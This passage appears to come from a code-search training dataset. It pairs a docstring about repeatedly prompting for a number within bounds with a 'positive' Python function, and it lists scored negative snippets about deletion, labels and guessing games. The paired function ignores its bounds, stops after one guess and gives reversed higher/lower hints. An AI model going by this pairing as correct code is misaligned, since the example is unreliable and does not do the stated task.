list(labelImage.GetDimensions()).reverse() # ??? 
this code has no effect, shape=None !!!\r\n labelArray = vtk.util.numpy_support.vtk_to_numpy(labelImage.GetPointData().GetScalars()).reshape(shape)\r\n if not label:\r\n labelArray[:] = 0\r\n else:\r\n labelArray[labelArray==label]=0\r\n self.editUtil.markVolumeNodeAsModified(widget.labelMapNode)", "def test_heads_pop_removes_branch(repository: Repository) -> None:\n heads = repository.heads\n heads[\"branch\"] = repository.head.commit\n heads.pop(\"branch\")\n assert \"branch\" not in heads", "def delete(self, *args, **kwargs):\n self.image.delete()\n super(Recipe, self).delete(*args, **kwargs)", "def logbook_delete(lb):\n return IMPL.logbook_delete(lb)", "def delete(self, request, p_name):\n project = Project.objects.get(name=p_name)\n connectors = project.connector_set.all()\n connectors.delete()\n if os.path.isfile(project.project_location):\n os.remove(project.project_location)\n project.delete()\n return HttpResponse(HTTPStatus.OK)", "def removeAutolabel(call, args=(), kwargs={}, nodeClass='*'):", "def delete(self, name):\n self.backend.delete(name)", "def set_labels(repo: Repository, labels: list[Label]):\n\n log.info(f\"Fetching existing labels from {repo.full_name}\")\n existing_labels = {label.name.casefold(): label for label in repo.get_labels()}\n log.info(f\"Found {len(existing_labels)} existing labels\")\n\n for label in labels:\n qualified_name = label.qualified_name\n folded_name = qualified_name.casefold()\n if folded_name not in existing_labels:\n log.info(f\"Creating label {qualified_name}\")\n repo.create_label(**label.api_arguments)\n elif label != existing_labels[folded_name]:\n log.info(f\"Updating label {qualified_name}\")\n existing_label = existing_labels[folded_name]\n existing_label.edit(**label.api_arguments)\n else:\n log.info(f\"Label {qualified_name} already exists\")", "def delete(self, *args, **kwargs):\n pass", "def delete(self, *args, **kwargs):\n pass", "async def slashtag_remove(self, ctx: commands.Context, *, tag: GuildTagConverter):\n await ctx.send(await tag.delete())", "def delete_inV(self, *labels):\r\n self._simple_deletion('inV', labels)", "def test_text_classifier_del(self):\n pass", "async def delete(self, ctx: \"IceTeaContext\", *, otag: TagConverter):\n tag: models.Tag = otag\n if tag.alias:\n if ctx.author.guild_permissions.administrator or tag.author == ctx.author.id:\n try:\n await tag.delete()\n await ctx.send(\"aliases deleted\")\n except:\n await ctx.send(\"Alias unsuccessfully deleted\")\n elif not tag.alias:\n if ctx.author.guild_permissions.administrator or tag.author == ctx.author.id:\n try:\n await tag.delete()\n await ctx.send(\"Tag and all aliases deleted\")\n except:\n await ctx.send(\"Tag unsuccessfully deleted\")\n else:\n await ctx.send(\"No Tag with that name found\")", "def remove_labels(self, test):\n ii = 0\n while ii < len(self.labels):\n if test(self.labels[ii]):\n self.labels.pop(ii)\n else:\n ii += 1\n return self", "def remove_labels(self, test):\n ii = 0\n while ii < len(self.labels):\n if test(self.labels[ii]):\n self.labels.pop(ii)\n else:\n ii += 1\n return self", "def remove_images_without_label(path_folder):\n\n\n #labels = os.listdir(path_folder + \"labels/val/\")\n labels = os.listdir(path_folder + \"labels/val/\")\n images = os.listdir(path_folder + \"images/val/\")\n for i in images:\n name_i = i.split(\".\")\n if name_i[0] + '.xml' not in labels:\n os.remove(path_folder + \"images/val/\" + i)" ]
[ "0.7348744", "0.716896", "0.7127642", "0.6931051", "0.6877669", "0.67660433", "0.67263836", "0.67033213", "0.6610836", "0.6601114", "0.6599512", "0.64673704", "0.64669335", "0.64562386", "0.6455143", "0.63759565", "0.6242319", "0.6198236", "0.61135364", "0.60569805", "0.6021209", "0.59816724", "0.5958259", "0.5939189", "0.5937705", "0.5898544", "0.5885807", "0.5855245", "0.5850653", "0.58377445", "0.5789876", "0.57627934", "0.57513314", "0.5738411", "0.5730703", "0.5697638", "0.56960636", "0.5687566", "0.56831104", "0.5676633", "0.56683296", "0.56574345", "0.56402993", "0.56383896", "0.5621577", "0.56136835", "0.55925643", "0.55852485", "0.55705905", "0.5548545", "0.5545445", "0.5541526", "0.55296934", "0.5526105", "0.5510325", "0.55090445", "0.54946715", "0.54793483", "0.54655725", "0.5456382", "0.5451846", "0.5439509", "0.5412041", "0.5407509", "0.5404987", "0.53997165", "0.5395931", "0.5393938", "0.53937817", "0.5387629", "0.5384648", "0.53686714", "0.5350697", "0.53444433", "0.5339747", "0.5320025", "0.53149575", "0.5313689", "0.5311122", "0.5302915", "0.53002524", "0.5298574", "0.52813345", "0.52787334", "0.5274709", "0.5274021", "0.5267229", "0.5257208", "0.52561533", "0.5251777", "0.5250819", "0.5245947", "0.5245947", "0.52452964", "0.5241319", "0.52298886", "0.52284443", "0.5221924", "0.5221924", "0.5216943" ]
0.8369633
0
Ask for a number between low and high until actually given one. Ask for a number, and if the response is outside the bounds keep asking until you get a number that you think is OK
def stubborn_asker(low, high): import random a=random.randint(1,100) for i in range(1,10): n=input('enter the number: ') if n.isdigit(): n=int(n) if n==a: return('Correct') break elif n>a: return('The number is bigger.') elif n<a: return('The number is smaller.') else: return('please enter an integer.') i+=1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ask_number(question, low, high):\n response = None\n while response not in range(low, high, 1):\n response = input(question)\n return response", "def ask_number(question, low, high):\n response = None\n while response not in range (low, high):\n response = int(input(question))\n return response", "def ask_number(question, low, high):\n response = None\n while response not in range(low, high):\n response = int(input(question))\n return response", "def ask_number(question, low, high):\n response = None\n while response not in range(low, high):\n response = int(input(question))\n return response", "def ask_number (question,low,high):\n response = None\n while response not in range(low,high):\n response = int(input(question))\n return response", "def ask_number(low, high, tries):\n the_number = None\n while the_number not in range(low, high):\n the_number = int(input(\"Enter a number between 1-100: \"))\n return the_number\n print(\"The computer has\", tries, \"tries to guess your number\\n\")", "def pick_number(low, high, limit):\n print(\"Think of a number from \" + str(low) + \" to \" +\n str(high) +\" and I will try to guess it and I will get a total of \" + str(limit) + \" tries. Press Enter when you are ready.\")\n input()", "def AskForNumberRange():\n\n\twhile True:\n\t\t# This OUTER loop will loop forever until the user enters correct integers for\n\t\t# lower and upper bound, such that lobound < hibound.\n\n\t\twhile True:\n\t\t\t# This INNER loop will loop forever until the user enters a valid value for lobound\n\t\t\tprint \"Enter the LOWER bound for the range of numbers, or press enter for default 1:\"\n\t\t\tlobound = SolicitInteger( default_return=1 )\n\t\t\tif lobound != None:\n\t\t\t\tprint \"Ok, lower bound of {}.\".format( lobound )\n\t\t\t\tbreak\n\n\t\twhile True:\n\t\t\t# This INNER loop will loop forever until the user enters a valid value for hibound\n\t\t\tprint \"Enter the UPPER bound for the range of numbers that's greater than the lowerbound, or press enter for default 20:\"\n\t\t\thibound = SolicitInteger( default_return=20 )\n\t\t\tif hibound != None:\n\t\t\t\tprint \"Ok, upper bound of {}.\".format( hibound )\n\t\t\t\tbreak\n\n\t\tif lobound < hibound:\n\t\t\t# We've got what we need! return out of this function!\n\t\t\treturn lobound, hibound\n\n\t\t# Uh oh. 
If we're still here, the user didn't enter in a correct range\n\t\tprint \"***Invalid input: upper bound must be greater than lower bound***\"\n\t\t# Back to the beginning of the outer loop", "def prompt_number(prompt, low_limit = 1, high_limit = 65535):\n while True:\n try:\n response = int(prompt_base(prompt))\n if low_limit <= response <= high_limit:\n return response\n except:\n pass", "def boundary(quantity, lower, upper):\r\n in_range = False\r\n while not in_range:\r\n if quantity < lower or quantity > upper:\r\n quantity = int(input(\"That is out of range, please try a number between \" + \\\r\n str(lower) + \" and \" + str(upper) + \": \"))\r\n else:\r\n in_range = True\r\n return quantity", "def get_integer(prompt: str, error_prompt: str, limits_prompt: str, min_num: int = -float('inf'),\n max_num: int = float('inf')) -> int:\n while True:\n try:\n integer = int(input(prompt))\n if max_num >= integer >= min_num:\n return integer\n print(limits_prompt)\n except ValueError:\n print(error_prompt)", "def part2():\n random_number = random.randrange(1,10,1)\n user_input = input(\"Guess the number: \")\n while(user_input != \"exit\"):\n if(int(user_input) > random_number):\n print(\"Too high\")\n elif(int(user_input) < random_number):\n print(\"Too low\")\n else:\n print(\"Exactly right\")\n user_input = input(\"Guess the number: \")", "def GetInteger(prompt=\"Please enter a number:\",\n lowerbound=0, upperbound=99,\n smaller_prompt=\"It's Smaller, please re-enter:\",\n bigger_prompt=\"It's Bigger, please re-enter:\",\n not_int_prompt=\"You did not enter a number, please re-enter:\"):\n user_input = input(prompt)\n\n def InternalFunc1(num):\n while True:\n try:\n return int(num)\n except ValueError:\n num = input(not_int_prompt)\n result = InternalFunc1(user_input)\n\n while not lowerbound <= result <= upperbound:\n if result < lowerbound:\n user_input = input(smaller_prompt)\n result = InternalFunc1(user_input)\n if upperbound < result:\n user_input = input(bigger_prompt)\n result = InternalFunc1(user_input)\n return result", "def get_number():\n valid_input = False\n while not valid_input:\n try:\n user_num = int(input(\"Enter a number between {} and {}: \".format(LOWER_BOUND, UPPER_BOUND)))\n if LOWER_BOUND <= user_num <= UPPER_BOUND:\n return user_num\n except ValueError:\n pass\n print(\"That is not a valid number !\")", "def _ask_user_range(question, first, last, default):\n\n while True:\n answer = input(question)\n if answer == \"\":\n answer = default\n break\n if re.findall(r\"[0-9+]\", answer):\n if int(answer) in range(first, last + 1):\n break\n else:\n print(\n \"Please a value between {} and {} or Return.\".format(\n first, last\n )\n )\n else:\n print(\n \"Please a number between {} and {} or Return.\".format(first, last)\n )\n\n return int(answer)", "def get_int(message, high, low=0):\r\n intValue = 1\r\n while True:\r\n try:\r\n intValue = int(input(message))\r\n except ValueError:\r\n print (\"ERROR, Entry must be a number. Please try again.\")\r\n continue\r\n if intValue <= low or intValue > high:\r\n print (\"ERROR, Entry must be greater than \" + str(low) + \" and, less than or equal to \"\\\r\n + str(high) + \". 
Please try again.\")\r\n continue\r\n break\r\n return intValue", "def get_int(lo, hi):\n while True:\n n = input(f\"Please enter an integer from {lo} to {hi}: \")\n try:\n n = int(n) \n except ValueError: \n print(\"It must be an integer!\") \n continue\n if n < lo: \n print(\"You can't use negative numbers...\")\n continue # needed, otherwise enters the else statement.\n if n > hi: \n print(\"Think smaller\")\n else:\n break # exit to return if meets conditions.\n return n", "def ask_number(message: str) -> int:\n global number\n assert isinstance(message, str), \"message should be a string\"\n stop_condition2 = False\n while not stop_condition2:\n try:\n number = int(input(message))\n if number < lower_range:\n print(\"Please pick a number within the range\", lower_range, \"and\", upper_range, \".\")\n elif number > upper_range:\n print(\"Please pick a number between\", lower_range, \"and\", upper_range, \".\")\n else:\n stop_condition2: bool = True\n except ValueError as ve:\n print(\"This is not a number.\")\n return number", "def guess_number(min_guess_range, max_guess_range):\n\tprint(f'guess the number between {min_guess_range} and {max_guess_range}!')\n\treturn check_input(min_guess_range, max_guess_range)", "def part2():\n randomNum = random.randint(1,9)\n guess = input('Please guess a number:')\n while (guess != randomNum) and (guess != \"exist\"):\n if randomNum > guess:\n print('too low')\n elif randomNum < guess:\n print('too high')\n guess = input('Please guess another number!:')", "def user_choice():\n number_choice=50 #for enter in a loop\n while number_choice < 0 or number_choice > 49:\n try:\n number_choice=int(input(\"enter number between 0 and 49 :\")) #ask user a number and convert it in integer\n except ValueError: # if number_choice not a number\n print(\"your enter is not a number\") #display error message\n number_choice = 50 #return in a loop\n if number_choice < 0 or number_choice >49:\n print(\"your enter is not included in range\") #display error message if number is out of range\n return number_choice", "def input_loop(menu_range):\n def check(inp, rng):\n\n try:\n chk = int(inp)\n except ValueError:\n return False\n\n if chk in range(0, rng):\n return True\n else:\n return False\n\n print('-' * 20) # spacer\n\n inpu = input('choose option: ')\n\n while not check(inpu, menu_range):\n inpu = input('try again: ')\n\n return int(inpu)", "def integer_input( min_value=0, max_value=999, default=0, \n prompt=\"please type number and press ENTER\"):\n while True:\n raw = input(prompt)\n if not raw.isdigit():\n print(\"please enter a number\")\n continue\n raw = int(raw)\n if min_value <= raw <= max_value:\n return raw\n print(\"please enter value between {} and {}\".format(min_value,\n max_value))", "def check_number(client, num, min, max):\r\n while True:\r\n try:\r\n # Convert it into integer\r\n temp = int(num)\r\n if temp >= min and temp <= max:\r\n break\r\n else:\r\n msg_client(client, \"Perfavore, inserire un numero compreso tra: \" + str(min) + \" e \" + str(max) + \": \")\r\n num= client.recv(BUFSIZ)\r\n except ValueError:\r\n msg_client(client, \"Perfavore, inserire un numero compreso tra: \" + str(min) + \" e \" + str(max) + \": \")\r\n num = client.recv(BUFSIZ) \r\n return temp", "def _readInt(self, prompt, small, large):\n prompt = prompt + ' (from ' + str(small) + ' to ' + str(large) + ')? 
'\n answer = small - 1 # intentionally invalid\n while not small <= answer <= large:\n try:\n answer = int(raw_input(prompt))\n if not small <= answer <= large:\n print 'Integer must be from '+str(small)+' to '+str(large)+'.'\n except ValueError:\n print 'That is not a valid integer.'\n return answer", "def valid(question, first, last):\n\n while 1:\n try:\n choice = input(question)\n if choice < first or choice > last or not isinstance(choice, int):\n print \"\\nInvalid input, please try again.\"\n else:\n return choice\n except Exception:\n print \"\\nInvalid input, please try again.\"", "def get_input():\n numb = int(input(\"Enter a number 1-10 \"))\n while True:\n if numb > 0 and numb < 10:\n return(numb)\n else:\n return(\"Please enter a value 1-10\")", "def ask_numbers(question, error):\n while True:\n value = 0\n try:\n value = int(input(question))\n except ValueError:\n print(error)\n except UnboundLocalError:\n print(error)\n except Exception:\n print(error)\n if value <= 0:\n print(\"Syötä positiivinen luku, joka on suurempi kuin 0\\n->\")\n else:\n break\n return value", "def checkRange(currentNumRange: tuple, currentLevel: int):\n\n\tlowerNumber, higherNumber = currentNumRange[0], currentNumRange[1]\n\tmid = (higherNumber + lowerNumber) // 2\n\tans = getAnswer(f\"Does your number is greater than {mid}?\", mid)\n\n\tif ans:\n\t\tlowerNumber = mid\n\telse:\n\t\thigherNumber = mid\n\n\n\treturn (lowerNumber, higherNumber)", "def pedir_entero(msg, min, max):\n while True:\n n = str(raw_input(msg))\n if not n.isdigit() :\n show_msg(\"Oops! Parece que eso no era un numero entero\")\n continue\n n = int(n)\n if n <= max and n >= min :\n return n\n else:\n show_msg(\"Numero fuera de rango\")\n continue", "def guest_num(max=20):\n rand_num = random.randint(1, 101)\n retries = 0\n while retries <= max:\n try:\n n = int(input('Input a number: '))\n if n == rand_num:\n print('YOU WIN!')\n break\n elif n > rand_num:\n print('Iputed number is great than result number. Just retry!')\n retries += 1\n else:\n print('Iputed number is less than result number. Just retry!')\n retries += 1\n except ValueError:\n print('Only can input a number!')\n except:\n print('Only can input a number!')\n else:\n print('YOU LOST!')", "def get_int_input_constrained(prompt, value_min, value_max, value_default):\n\n input_value = 0\n while input_value < 1:\n txt = input(prompt)\n try:\n input_value = min(max(int(txt), value_min), value_max)\n except ValueError:\n input_value = value_default\n\n return (True, input_value)", "def high_low():\n # Create a random number in the range [1,100] for the user to guess.\n secret_number = 37 # random.randint( 1, 100 )\n # For debugging purposes only, it's nice to know the secret.\n print( secret_number, flush=True ) # Add the flush to ensure there's no buffering.\n count = 0\n guess = 0\n low = 0\n high = 100\n # TODO 6: Implement the High Low guessing game as described in the lab document.\n while count < 7:\n guess = easygui.integerbox( \"Enter a guess between {} and {}:\".format( low, high), \"Input\", \"\", 1, 100 )\n count += 1\n if guess == secret_number:\n break\n if guess > secret_number:\n result = \"high\"\n high = guess\n else:\n result = \"low\"\n low = guess\n easygui.msgbox( \"Your guess of {} is too {}.\".format( guess, result ), \"Result\" )\n if guess == secret_number:\n easygui.msgbox(\"You win! 
You guessed {} in {} guesses\".format( secret_number, count ), \"Result\")\n else:\n easygui.msgbox(\"You Lose :( The secret number was {}\".format( secret_number), \"Result\")", "def PickNumber(lenList, message = ' To select the correct option pick a number in range ',min = 1, typeInput = int):\n while True:\n try:\n input1 = typeInput(input('\\n'+message+str(min)+'-'+str(lenList)+': \\t'))\n except ValueError:\n print( 'That\\'s not a number!')\n else:\n if min <= input1 <= lenList:\n return input1\n else:\n print( 'Number out of range. Try again!')", "def user_selection(num, text):\n lst = list(range(1,num+1))\n answer= 0\n while answer not in lst:\n try:\n answer = int(input(text))\n \n if answer not in range(1,num+1):\n raise ValueError\n break\n except ValueError:\n print('Select a valid Number')\n\n return answer", "def ask_for_numbers():\n requests.get(\"http://zero2.local:5000/get_num\", timeout=(20,0.02))\n return 1", "def guessnum3(num):\n low = 1 # lowest number we could guess\n high = 101 # highest number plus 1\n tries = 0\n\n # use a for loop instead of a while\n # guarantees we won't get stuck\n for _ in range(100): # we can replace the i with an '_' because we don't care about using the index\n my_guess = (low+high) // 2 # this is the mean rounded down\n tries += 1\n if my_guess == num:\n return tries # breaks loop\n elif my_guess > num:\n high = my_guess # this readjusts the higher portion of the halving algorithm\n else: # when your guess is lower than the number\n low = my_guess + 1 # readjusts the lower portion of the halving algorithm", "def NumberPick():\n hilo = 'lowest'\n num_list = []\n High = None\n while True:\n if len(num_list) == 2:\n break\n if High:\n hilo = 'highest'\n vanilla = f'Type in the {hilo} number: '\n nums = input(vanilla)\n if nums.isdigit():\n num_list.append(int(nums))\n High = True\n else:\n print('Enter only numbers.')\n print(\"The chosen number is... \" + str(randint(min(num_list), max(num_list))) + \"!\")\n start = input(\"Start again? 
\").lower()\n if start.startswith('y'):\n NumberPick()\n elif start.startswith('n') or QuBa(start):\n return", "def check_input(min_guess_range, max_guess_range):\n\twhile True:\n\t\ttry:\n\t\t\tplayerGuess = int(input('enter your guess: '))\n\t\t\tassert min_guess_range <= playerGuess <= max_guess_range\n\n\t\texcept AssertionError:\n\t\t\tprint('guess should be between {0} - {1}!'.format(min_guess_range, max_guess_range))\n\t\texcept ValueError:\n\t\t\tprint('numbers only!')\n\t\telse:\n\t\t\treturn playerGuess", "def evaluate_my_number(guess, random_number):\n if guess < random_number:\n print('Too low!')\n else: \n print ('Too high!')\n guess = check_raw()\n return guess", "def constrain(n: int, low: int, high: int) -> int:\n return max(min(n, high), low)", "def guess_a_number():\n\n # TODO:\n # generate a random number (uniformly distributed between 0 and 100)\n # read input from the user and validate that the input is numeric (use the function check_raw)\n # check whether the number was guessed \n # implement the functions evaluate_my_number, which checks whether the number is too high or too low\n # and print this information to the user\n # let the computer guess, therefore implement the demo_a_number function\n random_number=randint(0,100)\n \n '''versuche=0\n max_versuche=5\n guess=-1\n test= False\n while guess != random_number:\n while test == False:\n guess= input('Gib eine Zahl zwischen 0 und 100 ein: ')\n try:\n guess= int(guess)\n test=True\n except ValueError:\n print('Try Again')\n \n if guess == random_number:\n print('Du hast die Zahl erraten!')\n elif guess > random_number:\n print('Die Zahl ist zu gross')\n versuche=versuche+1\n else:\n print('Die Zahl ist zu klein')\n versuche=versuche+1'''", "def constrain(amt, low, high):\n if amt < low:\n return low\n elif amt > high:\n return high\n else:\n return amt", "def demo_a_number():\n random_number=randint(0,100)\n number=randint(0,100)\n print (random_number)\n print (number)\n if number == random_number:\n print('correct number')\n while number!=random_number:\n if number >random_number:\n print('number too high')\n number=randint(0,number)\n print(number)\n else:\n print('number too low')\n number=randint(number,100)\n print(number)\n print ('correct number: ')\n print(number)", "def guess_number():\n searched_number = random.randint(1, 10)\n while True:\n try:\n users_number = int(input(\"Guess the number: \"))\n except ValueError:\n print(\"It's not a number!\")\n continue\n if users_number > searched_number:\n print(\"Too big!\")\n elif users_number < searched_number:\n print(\"Too small!\")\n else:\n return \"You win!\"", "def get_float(message, high, low=0):\r\n\r\n while True:\r\n try:\r\n floatValue = float(input(message))\r\n except ValueError:\r\n print (\"ERROR, Entry must be a number. Please try again.\")\r\n continue\r\n if floatValue <= low or floatValue > high:\r\n print (\"ERROR, Entry must be greater than \" + str(low) + \" and, less than or equal to \"\\\r\n + str(high) + \". 
Please try again.\")\r\n continue\r\n break\r\n return floatValue", "def constrain(amt,low,high):\n if amt < low:\n return low\n elif amt > high:\n return high\n else:\n return amt", "def find_next(i, low, high):\n print(\"Searching from {} to {}...\".format(low, high))\n if low == high:\n set_search_addr(i, low)\n response = i.send(Compare())\n\n if response.value is True:\n print(\"Found ballast at {}; withdrawing it...\".format(low))\n i.send(Withdraw())\n return low\n return None\n\n set_search_addr(i, high)\n response = i.send(Compare())\n\n if response.value is True:\n midpoint = (low + high) // 2\n return find_next(i, low, midpoint) or find_next(i, midpoint + 1, high)", "def gameLogic(level = 0):\n\n\tallLevels = [0, 1, 2, 3, 4] #all possible levels of this game\n\t#ranges where the user must choose a number from the appropriate domain for each level\n\tnumberRanges = [(1, 500), (1, 1000), (1, 1500), (1, 2000), (1, 2500)] \n\tif level > 4:\n\t\treturn\n\tcurrentRange = numberRanges[level]\n\t\n\tprint(\"\\t\\t\\t***********************************************\")\n\tprint(f\"\\t\\t\\tKEEP IN YOUR MIND NUMBER FROM RANGE {currentRange[0]} to {currentRange[1]}!\")\n\tprint(\"\\t\\t\\t***********************************************\")\n\tready = getAnswer(\"Are you ready?\")\n\tprint(\"\\n\")\n\tif ready:\n\t\tlowerNumber, higherNumber = numberRanges[level][0], numberRanges[level][1]\n\t\trightAnswer = False\n\t\twhile (higherNumber > numberRanges[level][0] or higherNumber < numberRanges[level][1]) and not rightAnswer:\n\t\t\tmid = (higherNumber + lowerNumber) // 2\n\t\t\tans = getAnswer(f\"Does your number is {mid}?\", mid)\n\t\t\tif ans:\n\t\t\t\trightAnswer = True\n\t\t\telse:\n\t\t\t\tcurrentNumRange = lowerNumber, higherNumber\n\t\t\t\tlowerNumber, higherNumber = checkRange(currentNumRange, level)\n\n\t\tif level < 4:\n\t\t\tprint(\"\\t\\t===========================================\")\n\t\t\tprint(\"\\t\\tOK! Let's make it a little more complicated\")\n\t\t\tprint(\"\\t\\t===========================================\")\n\t\t\tlevel += 1\n\t\t\tgameLogic(level)\n\t\telse:\n\t\t\tprint(\"\\n\\t\\t\\t***************************************************\")\n\t\t\tprint(\"\\t\\t\\tEND OF GAME!\")\n\t\t\tprint(\"\\t\\t\\tI hope you made sure that I can guess any number!!\")\n\t\t\tprint(\"\\t\\t\\t******************************************************\")\n\n\telse: #don't ready\n\t\twhetherWannaContinue = getAnswer(\"OK: Do You want to continue this game? Am I waiting for you?\")\n\t\tif not whetherWannaContinue:\n\t\t\tprint(\"OK! 
Good bye!\")\n\t\t\treturn\n\t\telse:\n\t\t\talreadyReady = False\n\t\t\twhile not alreadyReady:\n\t\t\t\tprint(\"If you will be ready please Enter Y[es]\")\n\t\t\t\talreadyReady = getAnswer(\"Are you ready?\")\n\t\t\tgameLogic(level)", "def choose_in(low, high):\n return random.randint(low, high)", "def secure_input(self, minimum, maximum):\n wrong_input = True\n while wrong_input:\n while True:\n try:\n choice = int(input())\n break\n except ValueError:\n print(\"choisissez un chiffre qui vous est proposé dans la liste plus haut\")\n if choice < minimum or choice > maximum:\n print(\"choisissez un chiffre qui vous est proposé dans la liste plus haut\")\n else:\n wrong_input = False\n return choice", "def validate_correct_hint(self):\n is_response_hint_valid = False\n while is_response_hint_valid is False:\n hint_value = self.ask_user_input(\"Enter maximum hint threshold\")\n if not hint_value.isdigit():\n print(\"Not a number, please try again\")\n elif 0 <= int(hint_value) <= 81:\n is_response_hint_valid = True\n self.current_response = hint_value\n else:\n print(\"Number is out of the valid range, please try again\")\n return is_response_hint_valid", "def Demo():\n print(\"Users input:\", GetInteger())\n print(\"Users input:\", GetInteger(lowerbound=-3, upperbound=10))\n input(\"Please press <Enter> to exit the demo.\")", "def check_value(self, name, min_int, max_int):\n while True:\n numb = input(f\"-- {name} : Entrez une valeur comprise \"\n f\"entre {min_int} et {max_int} : \")\n try:\n check = int(numb)\n if check == 99 or min_int <= check <= max_int:\n break\n except ValueError:\n pass\n return check", "def GetRandomNumberFromLimits():\n smaller = int(input(\"Enter the smaller number: \"))\n larger = int(input(\"Enter a larger number: \"))\n return random.randint(smaller, larger)", "def ask_range(prompt, min, max, tips=[], default=None):\n print(prompt + ':')\n keys = [i for i in range(min, max+1)]\n if default is not None and default not in keys:\n raise KeyError('Default value not in range.')\n if len(keys) == len(tips):\n for key, tips in zip(keys, tips):\n print(key +'\\t-\\t'+ tips)\n elif len(tips) == 2 and len(keys) > 2:\n print(f'Range:\\n{min} ({tips[0]}) - {max} ({tips[1]})')\n else:\n print(f'Range: {min} - {max}')\n if default is None:\n hint = f'Pick an option ({min}-{max}): '\n else:\n hint = f'Pick an option ({min}-{max}) [{default}]: '\n option = input(hint)\n try:\n if option == '' and default is not None:\n return default\n elif option == '' or int(option) not in keys:\n print(f'Invalid option. 
Must be between {min} and {max}')\n return ask_range(prompt, min, max, tips, default)\n else:\n return int(option)\n except ValueError:\n print(f'Response must be and integer between {min} and {max}')\n return ask_range(prompt, min, max, tips, default)", "def guess_the_number(num_to_guess):\n correct = False\n answer = num_to_guess\n guesses = set()\n while not correct:\n guess = input(\"Guess a number between 0 and 99: (e to exit)\")\n if guess.upper() == 'E':\n print(\"Quitter\")\n correct = True\n break\n\n if good_integer_between(0, 99, guess):\n if int(guess) == answer:\n print('You guessed correctly wih {}!'.format(str(guess)))\n print(guesses)\n break\n elif int(guess) > answer:\n print('Your guess of {} is too high.'.format(str(guess)))\n guesses.add(int(guess))\n elif int(guess) < answer:\n print('Your guess of {} is too low.'.format(str(guess)))\n guesses.add(int(guess))\n pass", "def prompt_with_limits(prompt, default=None, low_limit=None, high_limit=None):\n msg = \"%s [%s]: \" % (prompt, default) if default is not None else \"%s: \" % prompt\n value = None\n while value is None:\n value = raw_input(msg).strip()\n if value:\n try:\n v = float(value)\n if (low_limit is not None and v < low_limit) or \\\n (high_limit is not None and v > high_limit):\n value = None\n except (ValueError, TypeError):\n value = None\n elif default is not None:\n value = default\n\n return value", "def _getCommand(self,high,menu):\n prompt=\"Enter a number from 1 to \"+str(high)\n commandRange=list(map(str,range(1,high+1)))\n error=\"Error,number must be 1 to \"+str(high)\n while True:\n print(menu)\n command=input(prompt)\n if command in commandRange:\n return int(command)\n else:\n print(error)", "def choose_number(maximum):\n while True:\n try:\n skip_lines(1)\n index = int(input(f\"Choose a number between 1 and {int(maximum)}: \"))\n if index <= 0 or index > maximum:\n raise IndexError\n break\n except ValueError:\n print(\"Oops! That's not a valid number. Try again...\")\n except IndexError:\n print(f\"Oops! That number is not possible. It has to be between 1 and {int(maximum)}. Try again...\")\n return index", "def test_pick():\r\n global user_pick\r\n while user_pick > pickno or user_pick <= 0 or type(user_pick):\r\n user_pick = int(input(\"How many balls do you want to get? (Up to 4)\"))\r\n #Keeps the number of balls picked by user to be between 0 and 4\r", "def get_number(pnum):\n global piles\n \n while True:\n userInput = int(input(\"How many? \"))\n if userInput >= 1 and userInput <= piles[pnum]:\n return userInput\n break", "def computer_guess(x):\n\n low = 1 \n high = x\n response = \"\"\n\n while response != 'c':\n\n if high != low:\n guess = random.randint(low, high)\n else:\n guess = low \n print(f\"I guessed your number and it is...{guess}\")\n break\n\n response = input(f\"Is {guess} the number you guessed? Is it high(h), low(l) or correct(c)? \").lower()\n\n if response == 'h':\n high = guess - 1\n elif response == 'l':\n low = guess + 1\n elif response == 'c':\n print(f\"Look, I correctly guessed your number as {guess}\")\n else:\n print(\"You don't deserve to play this game. 
You are a retarded human who can't even follow rules.\")\n break", "def get_guess(current_low, current_high):\n guess = (current_low + current_high) // 2\n return guess", "def binary_search(low, high, actual_number):\n tries = 0\n guess = 0\n\n # Write your code in here\n\n return {\"guess\": guess, \"tries\": tries}", "def main():\n # init variables\n lower_bound = 1\n higher_bound = 10\n guess = generate_guess(1, 10)\n while True:\n try:\n secret = input(\"What should the computer guess? Enter a number between 1 and 10: \")\n except ValueError:\n print(\"{} isn't a number!\".format(secret))\n while True:\n if int(guess) == int(secret):\n print(\"I guessed {}! Your number was {}! I win!\".format(guess, secret))\n play_again = input(\"Do you want to play again? (Y/n)\")\n if play_again != \"Y\":\n print(\"Thanks for playing!\")\n exit()\n else:\n main()\n elif int(guess) != int(secret):\n high_or_low = input(\"I guessed {}. Was it high or low? (H/L)\".format(guess))\n print(\"G: {}, HB: {}, LB: {}\".format(guess, higher_bound, lower_bound))\n if high_or_low == \"H\":\n higher_bound = guess - 1\n guess = generate_guess(lower_bound, higher_bound)\n elif high_or_low == \"L\":\n lower_bound = guess + 1\n guess = generate_guess(lower_bound, higher_bound)\n else:\n print(\"Please try again: \\n\")", "def user_input():\n user_number = input(\"Guess a number: \")\n try:\n user_number = int(user_number)\n except:\n print(\"Please ender a valid digit!\")\n return user_input()\n else:\n if 1 <= user_number <= 25:\n return user_number\n else:\n print(\"You need to enter a digit between 0 and 50\")\n return user_input()", "def get_positive_int(prompt):\n while True:\n n = get_int(prompt)\n if n > 0 and n < 9 :\n break\n return n", "def find_predict(number):\n \n att_counter = 0 \n min_num = 1 \n max_num = 101 \n while True:\n predict = min_num + (max_num - min_num)// 2\n att_counter +=1\n if number == predict:\n break\n elif number > predict:\n min_num = predict + 1 # set predicted number as lower limit \n elif number < predict:\n max_num = predict # set predicted number as upper limit \n return att_counter # number of attempts needed to \"guess\" the number", "def ask_with_input(string, range_param: int, str_choices: tuple,\n custom_validation: (callable, None) = None):\n while True:\n reply = input(string)\n try:\n if reply not in str_choices and not (\n custom_validation is not None and custom_validation(\n reply)):\n if range_param <= 0:\n continue\n elif int(reply) not in range(1, range_param + 1):\n continue\n except ValueError:\n continue\n break\n\n return reply", "def enterInteger(CustomMessage=\"Please enter an integer: \",\r\n CustomErrorMessage=\"The input is not an integer, please try again...\",\r\n min=None, max=None):\r\n \r\n isInteger = False\r\n while not isInteger:\r\n try:\r\n number = int(input(CustomMessage))\r\n isInteger = True\r\n except ValueError:\r\n print(CustomErrorMessage)\r\n\r\n # range parameter\r\n if type(min) is int and type(max) is int:\r\n if min > max:\r\n raise ValueError(\"parameter 'min' is larger than 'max'\")\r\n else:\r\n while min > number or number > max:\r\n number = enterInteger(CustomMessage=\"Please input a number within \"+str(min)+\" to \"+str(max)+\": \")\r\n elif type(min) is int:\r\n while min > number:\r\n number = enterInteger(CustomMessage=\"Please input a number larger than \" + str(min) + \": \")\r\n elif type(max) is int:\r\n while number > max:\r\n number = 